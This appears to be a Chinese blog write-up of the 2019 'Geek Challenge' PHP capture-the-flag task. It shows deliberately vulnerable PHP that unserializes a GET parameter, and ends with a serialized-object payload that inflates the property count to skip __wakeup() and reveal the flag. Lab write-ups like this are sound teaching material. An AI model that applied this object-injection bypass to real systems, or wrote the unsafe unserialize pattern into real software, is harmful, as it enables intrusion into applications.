[极客大挑战 2019]PHP_wirteup
打开网站
提示网站有备份
扫描网站目录
下载文件,代码审计
代码审计
class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'admin'; // private 类型
private $password = 100;
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest'; //修改参数值 绕过__wakeup()
}
function __destruct(){
if ($this->password != 100) { // password = 100
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') { //username === "admin"
global $flag;
echo $flag; //最终执行成功
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
flag.php
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
index.php
<?php
include 'class.php';
$select = $_GET['select']; //获得select参数,会经过反序列化,所以传递的select参数值应该是序列化之后的字符串;
$res=unserialize(@$select); //反序列化
?>
payload
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15728533.html